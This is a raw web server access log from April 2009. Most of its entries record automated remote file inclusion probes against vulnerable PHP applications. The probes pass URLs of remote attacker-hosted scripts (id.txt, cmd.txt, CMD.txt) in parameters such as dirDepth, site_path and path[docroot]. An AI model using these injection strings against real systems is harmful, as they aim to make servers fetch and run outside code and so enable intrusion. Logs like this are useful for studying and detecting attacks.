67.212.165.114 - - [17/Apr/2009:09:19:46 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
75.145.152.113 - - [17/Apr/2009:09:22:34 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ohnnurychurch.org/bbs/nyot/v6.txt??%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
75.145.152.113 - - [17/Apr/2009:09:22:35 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ohnnurychurch.org/bbs/nyot/v6.txt??%0D?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
93.164.123.218 - - [17/Apr/2009:09:26:13 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:09:26:13 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:09:27:16 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:09:27:16 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
70.48.15.23 - - [17/Apr/2009:09:29:17 -0500] "GET /logs/includes/class_item.php?fileExtension=http://www.reeftastic.com/cart/media/index/bo.do?%0D?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
70.48.15.23 - - [17/Apr/2009:09:29:17 -0500] "GET /includes/class_item.php?fileExtension=http://www.reeftastic.com/cart/media/index/bo.do?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
202.165.244.10 - - [17/Apr/2009:09:36:00 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.165.244.10 - - [17/Apr/2009:09:36:00 -0500] "GET /errors.php?error=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
202.165.244.10 - - [17/Apr/2009:09:36:00 -0500] "GET /logs/errors.php?error=http://www.c868c.com/vnc/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:09:36:29 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:09:36:29 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:09:36:29 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
65.19.178.235 - - [17/Apr/2009:09:36:58 -0500] "GET /logs/errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
65.19.178.235 - - [17/Apr/2009:09:36:58 -0500] "GET /errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
83.138.144.89 - - [17/Apr/2009:09:37:02 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:09:37:02 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:09:37:03 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.25.21.148 - - [17/Apr/2009:09:40:56 -0500] "GET /logs//login.php?dir=http://www.look22.de/slideshow/javascript/jahem.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
216.104.37.122 - - [17/Apr/2009:09:40:58 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.825"
216.104.37.122 - - [17/Apr/2009:09:40:58 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.825"
218.25.21.148 - - [17/Apr/2009:09:40:59 -0500] "GET //login.php?dir=http://www.look22.de/slideshow/javascript/jahem.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
212.175.228.229 - - [17/Apr/2009:09:41:00 -0500] "GET /logs//backend/addons/links/index.php?PATH=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
212.175.228.229 - - [17/Apr/2009:09:41:06 -0500] "GET /logs/access_log.1238112000//backend/addons/links/index.php?PATH=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
212.175.228.229 - - [17/Apr/2009:09:41:06 -0500] "GET //backend/addons/links/index.php?PATH=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
65.19.178.235 - - [17/Apr/2009:09:41:15 -0500] "GET /logs/errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
65.19.178.235 - - [17/Apr/2009:09:41:15 -0500] "GET /errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
202.75.4.169 - - [17/Apr/2009:09:41:16 -0500] "GET /logs/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.75.4.169 - - [17/Apr/2009:09:41:17 -0500] "GET /errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
64.56.65.106 - - [17/Apr/2009:09:43:34 -0500] "GET /logs//appserv/index.php? HTTP/1.1" 404 306 "-""libwww-perl/5.819"
64.56.65.106 - - [17/Apr/2009:09:43:35 -0500] "GET //appserv/index.php? HTTP/1.1" 404 301 "-""libwww-perl/5.819"
77.221.130.18 - - [17/Apr/2009:09:45:06 -0500] "GET //?path%5Bdocroot%5D=http://zonadeclientes.com/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:09:45:06 -0500] "GET /logs/access_log.1237420800//?path%5Bdocroot%5D=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:09:45:07 -0500] "GET /logs//?path%5Bdocroot%5D=http://zonadeclientes.com/id1.txt? HTTP/1.1" 200 185886 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:09:45:24 -0500] "GET /logs/access_log.1237420800//?path%5Bdocroot%5D=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:09:45:24 -0500] "GET //?path%5Bdocroot%5D=http://zonadeclientes.com/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:09:45:26 -0500] "GET /logs//?path%5Bdocroot%5D=http://zonadeclientes.com/id1.txt? HTTP/1.1" 200 185886 "-""Mozilla/5.0"
202.75.4.169 - - [17/Apr/2009:09:48:02 -0500] "GET /logs/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.75.4.169 - - [17/Apr/2009:09:48:03 -0500] "GET /errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
200.158.124.146 - - [17/Apr/2009:09:53:52 -0500] "GET /ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
200.158.124.146 - - [17/Apr/2009:09:53:52 -0500] "GET /logs/ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
200.158.124.146 - - [17/Apr/2009:09:53:56 -0500] "GET /logs/access_log.1237593600/ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
208.64.202.134 - - [17/Apr/2009:09:57:25 -0500] "GET /logs/access_log.1237161600//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
208.64.202.134 - - [17/Apr/2009:09:57:25 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
208.64.202.134 - - [17/Apr/2009:09:57:25 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
69.48.134.176 - - [17/Apr/2009:09:58:04 -0500] "GET /logs//?path%5Bdocroot%5D=http://77.74.195.211/modernbill//include/misc/susuwmuw/cmd.txt?? HTTP/1.1" 200 185886 "-""libwww-perl/5.79"
69.48.134.176 - - [17/Apr/2009:09:58:04 -0500] "GET //?path%5Bdocroot%5D=http://77.74.195.211/modernbill//include/misc/susuwmuw/cmd.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
208.64.202.134 - - [17/Apr/2009:09:58:26 -0500] "GET /logs/access_log.1236124800//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.jobs.traders.cc//id?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
218.185.20.88 - - [17/Apr/2009:09:59:55 -0500] "GET /logs/access_log.1233964800/rate.php//?sIncPath=http://www.ohnnurychurch.org/bbs/nyot/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.185.20.88 - - [17/Apr/2009:09:59:55 -0500] "GET /logs/rate.php//?sIncPath=http://www.ohnnurychurch.org/bbs/nyot/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.185.20.88 - - [17/Apr/2009:09:59:55 -0500] "GET /rate.php//?sIncPath=http://www.ohnnurychurch.org/bbs/nyot/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
208.64.202.134 - - [17/Apr/2009:10:00:04 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
208.64.202.134 - - [17/Apr/2009:10:00:04 -0500] "GET /logs/access_log.1237161600//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
208.64.202.134 - - [17/Apr/2009:10:00:04 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.185.20.88 - - [17/Apr/2009:10:00:22 -0500] "GET /rate.php//?sIncPath=http://www.ohnnurychurch.org/bbs/nyot/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.185.20.88 - - [17/Apr/2009:10:00:22 -0500] "GET /logs/rate.php//?sIncPath=http://www.ohnnurychurch.org/bbs/nyot/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.185.20.88 - - [17/Apr/2009:10:00:22 -0500] "GET /logs/access_log.1233964800/rate.php//?sIncPath=http://www.ohnnurychurch.org/bbs/nyot/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.202.134 - - [17/Apr/2009:10:01:16 -0500] "GET /logs/access_log.1236124800//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.az-rcfreaks.com/freaks/id.gif?? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.185.20.88 - - [17/Apr/2009:10:01:41 -0500] "GET /logs/access_log.1234656000/rate.php//?sIncPath=http://www.ohnnurychurch.org/bbs/nyot/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.56.65.106 - - [17/Apr/2009:10:01:49 -0500] "GET //appserv/main.php? HTTP/1.1" 404 300 "-""libwww-perl/5.819"
64.56.65.106 - - [17/Apr/2009:10:01:49 -0500] "GET /logs//appserv/main.php? HTTP/1.1" 404 305 "-""libwww-perl/5.819"
218.185.20.88 - - [17/Apr/2009:10:02:22 -0500] "GET /logs/access_log.1234656000/rate.php//?sIncPath=http://www.ohnnurychurch.org/bbs/nyot/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.185.20.88 - - [17/Apr/2009:10:03:14 -0500] "GET /logs/rate.php//?sIncPath=http://gh-book.com.tw/idi.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
218.185.20.88 - - [17/Apr/2009:10:03:14 -0500] "GET /rate.php//?sIncPath=http://gh-book.com.tw/idi.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
218.185.20.88 - - [17/Apr/2009:10:03:18 -0500] "GET /logs/rate.php//?sIncPath=http://gh-book.com.tw/idi.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
218.185.20.88 - - [17/Apr/2009:10:03:18 -0500] "GET /rate.php//?sIncPath=http://gh-book.com.tw/idi.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
212.159.7.160 - - [17/Apr/2009:10:10:33 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
212.159.7.160 - - [17/Apr/2009:10:10:34 -0500] "GET /include/lib.inc.php?site_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
212.159.7.160 - - [17/Apr/2009:10:10:34 -0500] "GET /logs/include/lib.inc.php?site_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
212.159.7.160 - - [17/Apr/2009:10:11:13 -0500] "GET /logs/access_log.1233878400/include/lib.inc.php?site_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
212.175.228.229 - - [17/Apr/2009:10:16:28 -0500] "GET /logs/access_log.1237420800//?path%5Bdocroot%5D=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.175.228.229 - - [17/Apr/2009:10:16:29 -0500] "GET //?path%5Bdocroot%5D=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
212.175.228.229 - - [17/Apr/2009:10:16:31 -0500] "GET /logs//?path%5Bdocroot%5D=http://sito.blackdrag0n.net/Cartoon/fx/fx1.txt?? HTTP/1.1" 200 185886 "-""Mozilla/5.0"
85.119.154.129 - - [17/Apr/2009:10:19:50 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
85.119.154.129 - - [17/Apr/2009:10:19:50 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
85.119.154.129 - - [17/Apr/2009:10:20:21 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
85.119.154.129 - - [17/Apr/2009:10:20:21 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
67.212.165.114 - - [17/Apr/2009:10:23:21 -0500] "GET /logs/include/lib.inc.php?site_path=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:10:23:21 -0500] "GET /include/lib.inc.php?site_path=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
65.55.106.163 - - [17/Apr/2009:10:24:12 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.163 - - [17/Apr/2009:10:24:47 -0500] "GET /logs/access_log.1148601600 HTTP/1.0" 200 2024 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.43.212.111 - - [17/Apr/2009:10:25:20 -0500] "GET /logs//zentrack/index.php?configFile=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
211.43.212.111 - - [17/Apr/2009:10:25:20 -0500] "GET /logs/access_log.1238112000//zentrack/index.php?configFile=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.43.212.111 - - [17/Apr/2009:10:25:20 -0500] "GET //zentrack/index.php?configFile=http://elitewa.go.ro/copyright.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.185.20.88 - - [17/Apr/2009:10:28:51 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://gh-book.com.tw/idi.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
218.185.20.88 - - [17/Apr/2009:10:28:51 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://gh-book.com.tw/idi.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
218.185.20.88 - - [17/Apr/2009:10:28:55 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://gh-book.com.tw/idi.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
218.185.20.88 - - [17/Apr/2009:10:28:55 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://gh-book.com.tw/idi.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
67.212.165.114 - - [17/Apr/2009:10:29:23 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:10:29:23 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:10:29:52 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:10:29:52 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
210.109.101.217 - - [17/Apr/2009:10:32:33 -0500] "GET /logs//?path%5Bdocroot%5D=http://in.geocities.com/awalaboyz/cid.txt??? HTTP/1.1" 200 185886 "-""libwww-perl/5.79"
210.109.101.217 - - [17/Apr/2009:10:32:35 -0500] "GET //?path%5Bdocroot%5D=http://in.geocities.com/awalaboyz/cid.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
67.212.165.114 - - [17/Apr/2009:10:36:32 -0500] "GET /include/lib.inc.php?site_path=http://paidtowin.com/auction//uploaded/id.txt??%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
67.212.165.114 - - [17/Apr/2009:10:36:32 -0500] "GET /logs/include/lib.inc.php?site_path=http://paidtowin.com/auction//uploaded/id.txt??%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
86.106.92.23 - - [17/Apr/2009:10:43:17 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://freebannerdisplays.com/testvideo/videos/copyright.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
86.106.92.23 - - [17/Apr/2009:10:43:17 -0500] "GET //skin/zero_vote/error.php?dir=http://freebannerdisplays.com/testvideo/videos/copyright.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
86.106.92.23 - - [17/Apr/2009:10:43:17 -0500] "GET /logs/access_log.1230595200//skin/zero_vote/error.php?dir=http://freebannerdisplays.com/testvideo/videos/copyright.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
86.106.92.23 - - [17/Apr/2009:10:43:44 -0500] "GET /logs/access_log.1233964800//skin/zero_vote/error.php?dir=http://freebannerdisplays.com/testvideo/videos/copyright.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
93.164.123.218 - - [17/Apr/2009:10:49:18 -0500] "GET /logs//includes/get_header.php?vwar_root=http://oursoultvxq.com/bbs/data/vip/id2.txt????? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
93.164.123.218 - - [17/Apr/2009:10:49:19 -0500] "GET //includes/get_header.php?vwar_root=http://oursoultvxq.com/bbs/data/vip/id2.txt????? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
196.40.83.75 - - [17/Apr/2009:10:50:31 -0500] "GET /logs//manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.810"
196.40.83.75 - - [17/Apr/2009:10:50:31 -0500] "GET //manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
210.109.101.217 - - [17/Apr/2009:10:51:09 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://in.geocities.com/awalaboyz/cid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
210.109.101.217 - - [17/Apr/2009:10:51:10 -0500] "GET //skin/zero_vote/error.php?dir=http://in.geocities.com/awalaboyz/cid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
85.214.94.23 - - [17/Apr/2009:10:53:16 -0500] "GET /logs//includes/get_header.php?vwar_root=http://www.rapidfiretheatre.com/textpattern/pulaid.txt??%0D? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
85.214.94.23 - - [17/Apr/2009:10:53:16 -0500] "GET /logs/access_log.1236643200//includes/get_header.php?vwar_root=http://www.rapidfiretheatre.com/textpattern/pulaid.txt??%0D? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
85.214.94.23 - - [17/Apr/2009:10:53:16 -0500] "GET //includes/get_header.php?vwar_root=http://www.rapidfiretheatre.com/textpattern/pulaid.txt??%0D? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
85.214.94.23 - - [17/Apr/2009:10:53:23 -0500] "GET /logs/access_log.1233100800//includes/get_header.php?vwar_root=http://www.rapidfiretheatre.com/textpattern/pulaid.txt??%0D? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.19.178.235 - - [17/Apr/2009:10:57:29 -0500] "GET /logs/errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
65.19.178.235 - - [17/Apr/2009:10:57:29 -0500] "GET /errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
200.93.147.154 - - [17/Apr/2009:10:59:39 -0500] "GET /logs/access_log.1236729600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.geocities.com/windiayu35/idpit.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
79.189.194.35 - - [17/Apr/2009:10:59:43 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
79.189.194.35 - - [17/Apr/2009:10:59:43 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
79.189.194.35 - - [17/Apr/2009:10:59:43 -0500] "GET //skin/zero_vote/error.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
79.189.194.35 - - [17/Apr/2009:10:59:44 -0500] "GET //skin/zero_vote/error.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
202.75.4.169 - - [17/Apr/2009:11:00:31 -0500] "GET /logs/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.75.4.169 - - [17/Apr/2009:11:00:31 -0500] "GET /errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
200.93.147.154 - - [17/Apr/2009:11:03:55 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.geocities.com/windiayu35/idpit.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.93.147.154 - - [17/Apr/2009:11:03:55 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.geocities.com/windiayu35/idpit.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
66.220.4.131 - - [17/Apr/2009:11:07:56 -0500] "GET /logs//manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.803"
66.220.4.131 - - [17/Apr/2009:11:07:56 -0500] "GET //manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
200.93.147.154 - - [17/Apr/2009:11:08:47 -0500] "GET /logs/access_log.1238803200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.geocities.com/windiayu35/idpit.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
67.212.165.114 - - [17/Apr/2009:11:09:14 -0500] "GET /logs/access_log.1235174400//admin/common.inc.php?base_path=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
